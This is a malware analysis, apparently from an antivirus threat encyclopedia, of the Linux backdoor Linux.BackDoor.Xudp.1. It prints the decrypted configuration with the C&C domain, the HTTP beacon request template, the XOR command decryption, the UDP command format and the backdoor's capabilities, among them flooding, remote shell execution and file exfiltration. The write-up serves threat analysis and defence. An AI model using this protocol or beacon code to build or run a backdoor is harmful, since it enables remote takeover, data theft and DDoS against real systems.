SHA1
- 3a5f73d9beb74ee017965fa8922b2228fb684816
A backdoor for Linux that is installed by other downloader Trojans. The main module is located in the /lib/ folder. Its autorun function is enabled in the cron scheduler. At the Trojan’s installation, the contents of the iptables utility is cleared.
Once launched, Linux.BackDoor.Xudp.1 decrypts configuration data hard-coded in the Trojan’s body that looks as follows:
dr0id1.xyz ; the C&C server
transfer.php ; Page to which requests are sent
XorUDP ; Name of the backdoor that is used as User-Agent when
generating requests
300 ; Http sleep time
5 ; Keepalive sleep time
/bin/socket ;NewProcName
1 ;usemutex
700 ;low range udp port
800 ;high rande udp portEncrypted lines are stored and sent as follows:
<lenght>:<encrypted value>
10:09Ц<о*.ЙsIf the NewProcName parameter has a non-zero value, the Trojan’s process is hidden under the name specified in the configuration.
If the usemutex parameter also is not set to zero, the “/var/.mutexlock” file is blocked. If the Trojan fails to block this file, it stops operating.
Then the Trojan generates a 128-byte key, selects a value of the UDP port, and runs three threads: HTTP_Thread, UDP_Listen, and UDP_KeepAlive.
HTTP_Thread
When this thread is launched, the Trojan sends a generated key, a port’s address, and the backdoor’s version to the server. Then it periodically requests the following page from the server:
template1 = "k=%s&p=%s&v=%s&s=1"
param1 = encodenum(ourKey)
param2 = encodenum(udpPort)
param3 = encodenum(version)
params = template1 % (param1,param2, param3)
request = "POST /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s"
actualRequest = request % (page, host, name, len(params), params)The server replies with one of 4 messages:
| First 2 bytes | Function |
|---|---|
| 00 | Install client_key + client_port + client_ip |
| 01 | Execute a command |
| 02 | Reset client_key, client_port, client_ip |
| 03 | Terminate execution |
All instructions are first decrypted with a key generated by the backdoor. Then the obtained buffer is decrypted using client_key:
XOR(msg, len, ourKey);
XOR(msg, len, &client_key);UDP_Listen
If a datagram was not received from client_ip, it is ignored. If the client_key value is not set, nothing happens. An incoming UDP message is decrypted and looks as follows:
<handler>:<transaction_id> <command>| Field | Function |
|---|---|
| msg_id | Message ID. All incoming msg_id are saved, and a command is executed only if an unknown msg_id is received. |
| Handler | A 8-bytes command identifier |
| command | Random line |
The backdoor can execute the following commands:
- Runs flood (i.e. sending repeated requests to a remote server)
- Terminates flood
- Executes an incoming command with the system() function
- Launches a received line using the popen function and returns the command’s output
- Opens a listening UDP socket that logs all requests to this port in a specified file in the <ipaddr> <size> <List Port> format
- Sends the specified file by parts of a certain size in specified time interval
- Scans a specified range of IP addresses
- Sends a list of msg_id, that are less than those of the current message, which were not processed
- Marks sent msg_id as processed
- Terminates execution
UDP_KeepAlive:
The malware sends a specific datagram to the server in order to inform that it is still active.
